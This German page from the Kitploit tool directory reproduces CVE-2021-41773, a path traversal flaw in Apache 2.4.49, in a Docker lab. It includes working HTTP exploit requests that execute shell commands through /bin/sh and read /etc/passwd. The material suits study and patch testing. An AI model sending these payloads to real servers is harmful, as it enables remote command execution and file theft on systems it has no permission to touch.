Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-41773 — Reproduktion von CVE-2021-41773 | Kitploit
Tools/GitHubGitHub/1nhann/cve-2021-41773
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHub1nhann/cve-2021-41773

CVE-2021-41773

Reproduktion von CVE-2021-41773

Repository anzeigen
94vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-41773 Reproduktion

https://www.tenable.com/blog/cve-2021-41773-path-traversal-zero-day-in-apache-http-server-exploited

Apache v2.4.49 spezifische Schwachstelle; in früheren Versionen gab es die Funktion ap_normalize_path nicht. Diese Funktion wurde in Version 2.4.49 eingeführt und führte genau zu einem Path Traversal. In v2.4.50 wurde sie behoben.

Umgebung

https://github.com/1nhann/CVE-2021-41773

In dieser Umgebung ist das CGI-Modul geladen:

root@kitploit:~
LoadModule cgi_module modules/mod_cgi.so
root@kitploit:~
root@ubuntu:~/$ git clone https://github.com/1nhann/CVE-2021-41773.git
root@ubuntu:~/$ cd CVE-2021-41773
root@ubuntu:~/CVE-2021-41773$ docker build -t cve .
root@ubuntu:~/CVE-2021-41773$ docker run -d -p 12345:80 cve

Im Container: image-20211006213843476

PoC

root@kitploit:~
GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bash.cgi HTTP/1.1
Host: 127.0.0.1:12345
User-Agent: curl/7.68.0
Accept: */*
Connection: close


image-20211006210008166

Führt das /bash.cgi im Wurzelverzeichnis aus.

Shell erhalten

Siehe Apache-Dokumentation zu CGI:

STDIN and STDOUT

Other communication between the server and the client happens over standard input (STDIN) and standard output (STDOUT). In normal everyday context, STDIN means the keyboard, or a file that a program is given to act on, and STDOUT usually means the console or screen.

When you POST a web form to a CGI program, the data in that form is bundled up into a special format and gets delivered to your CGI program over STDIN. The program then can process that data as though it was coming in from the keyboard, or from a file

The "special format" is very simple. A field name and its value are joined together with an equals (=) sign, and pairs of values are joined together with an ampersand (&). Inconvenient characters like spaces, ampersands, and equals signs, are converted into their hex equivalent so that they don't gum up the works. The whole data string might look something like:

root@kitploit:~
name=Rich%20Bowen&city=Lexington&state=KY&sidekick=Squirrel%20Monkey

Das bedeutet, dass die per POST übergebenen Parameter als Inhalt von stdin an das aufgerufene CGI-Programm übergeben werden.

Wenn auf /bin/sh zugegriffen wird, kann direkt eine Shell erhalten werden.

PoC:

root@kitploit:~
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host: 127.0.0.1:12345
User-Agent: curl/7.68.0
Accept: */*
Content-Length: 22
Content-Type: application/x-www-form-urlencoded
Connection: close

data=;touch /tmp/pwned

image-20211006213421718

Ermöglicht auch die direkte Ausgabe von Befehlsausführungsergebnissen:

PoC:

root@kitploit:~
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host: 127.0.0.1:12345
User-Agent: curl/7.68.0
Accept: */*
Content-Length: 22
Content-Type: application/x-www-form-urlencoded
Connection: close

echo Content-Type: text/plain; echo; id

Beliebige Dateien lesen

Wenn das CGI-Modul nicht geladen ist, wird die angeforderte Datei nicht ausgeführt:

root@kitploit:~
#LoadModule cgi_module modules/mod_cgi.so

PoC:

root@kitploit:~
GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: 127.0.0.1:12345
User-Agent: curl/7.68.0
Accept: */*
Connection: close


image-20211006232521116

Tool herunterladen